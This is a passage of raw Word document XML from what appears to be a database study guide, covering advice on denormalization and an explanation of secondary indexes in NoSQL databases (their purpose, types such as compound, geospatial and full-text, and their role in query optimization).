          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Balance Performance and Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Carefully balance the performance gains from denormalization with the potential impact on data consistency and complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3338AE" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Use Denormalization Judiciously</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Apply denormalization selectively to areas where it provides clear benefits, rather than applying it universally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57125648" w14:textId="77777777" w:rsidR="00C5104D" w:rsidRPr="00DA2F32" w:rsidRDefault="00C5104D" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="461"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Monitor and Maintain</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Regularly monitor performance and consistency to ensure that denormalization continues to meet the application's needs and address any emerging issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E900F" w14:textId="77777777" w:rsidR="00135B2C" w:rsidRPr="00DA2F32" w:rsidRDefault="00135B2C" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75DCE309" w14:textId="05230B0F" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc178383324"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>What are secondary indexes in NoSQL databases, and how are they used for query optimization?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="21320B05" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Secondary indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in NoSQL databases are indexes created on fields other than the primary key to optimize query performance and enable efficient data retrieval based on non-primary key attributes. Unlike the primary index, which is usually built on the primary key and organizes data physically on disk, secondary indexes allow queries to efficiently search for data based on various attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DD833B" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Purpose of Secondary Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28001BB1" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Query Optimization</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2733240D" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="462"/>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Secondary indexes improve query performance by allowing efficient lookups on fields other than the primary key. They reduce the need for full table scans and speed up query execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFADCE3" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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database with a primary key on userID, a secondary index on email allows quick retrieval of user records based on email addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F8EC53" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flexible Querying</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398EE95F" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="462"/>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They enable queries based on multiple attributes, providing more flexibility in how data can be queried.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9BA459" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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product catalog, secondary indexes on category and price enable efficient querying of products by category or price range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFCC511" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="462"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Support for Complex Queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F211C1B" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="462"/>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Secondary indexes support more complex query patterns that are not possible with primary keys alone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54400642" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Querying for all orders placed within a specific date range and by a particular customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373CF2A3" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Types of Secondary Indexes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383516D4" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Single-Field Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B9A505" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Indexes created on a single field or attribute in the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FCA122" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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 index on a username field in a user table to optimize queries based on usernames.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE79E9" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Compound Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535789FA" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Indexes created on multiple fields, which are often used to support queries that filter on multiple attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60552DB6" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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 index on firstName and lastName fields to optimize queries that search for users based on both names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC77C8E" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Geospatial Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06021A79" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Indexes designed to optimize queries involving geographic locations or spatial data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE40FE" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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 index on latitude and longitude coordinates to support location-based queries, such as finding nearby points of interest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D00A1F" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="463"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Full-Text Indexes</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221036D" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="463"/>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Indexes that support full-text search capabilities, allowing for efficient text searching and querying within large text fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778D6754" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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 index on a description field to enable full-text search for keywords within product descriptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C1EFBD" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How Secondary Indexes Are Used for Query Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5916E0A1" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Speeding Up Query Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB45874" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="464"/>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Secondary indexes allow the database to quickly locate the data matching the query criteria without scanning the entire dataset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB23D6B" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Querying for all users with a specific email domain is accelerated by an index on the email field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EB258F" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reducing I/O Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220CCA2C" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="464"/>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By quickly narrowing down the search results, secondary indexes reduce the amount of data read from disk, minimizing I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4D10D" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Retrieving product details based on a price range with a compound index on price reduces the need to read and filter through unrelated data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C4BC1C" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Enhancing Filtering and Sorting</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34715697" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="464"/>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Secondary indexes support efficient filtering and sorting based on indexed attributes, improving query performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B139F37" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Sorting a list of users by their registrationDate field using a secondary index on registrationDate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0024F" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="464"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Supporting Aggregations and Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F557F4" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="464"/>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Secondary indexes can enhance the performance of aggregation operations and support efficient join-like operations within NoSQL databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C21E0" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="46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Aggregating sales data by productCategory is optimized by an index on productCategory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC8057" w14:textId="77777777" w:rsidR="000925B8" w:rsidRPr="00DA2F32" w:rsidRDefault="000925B8" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
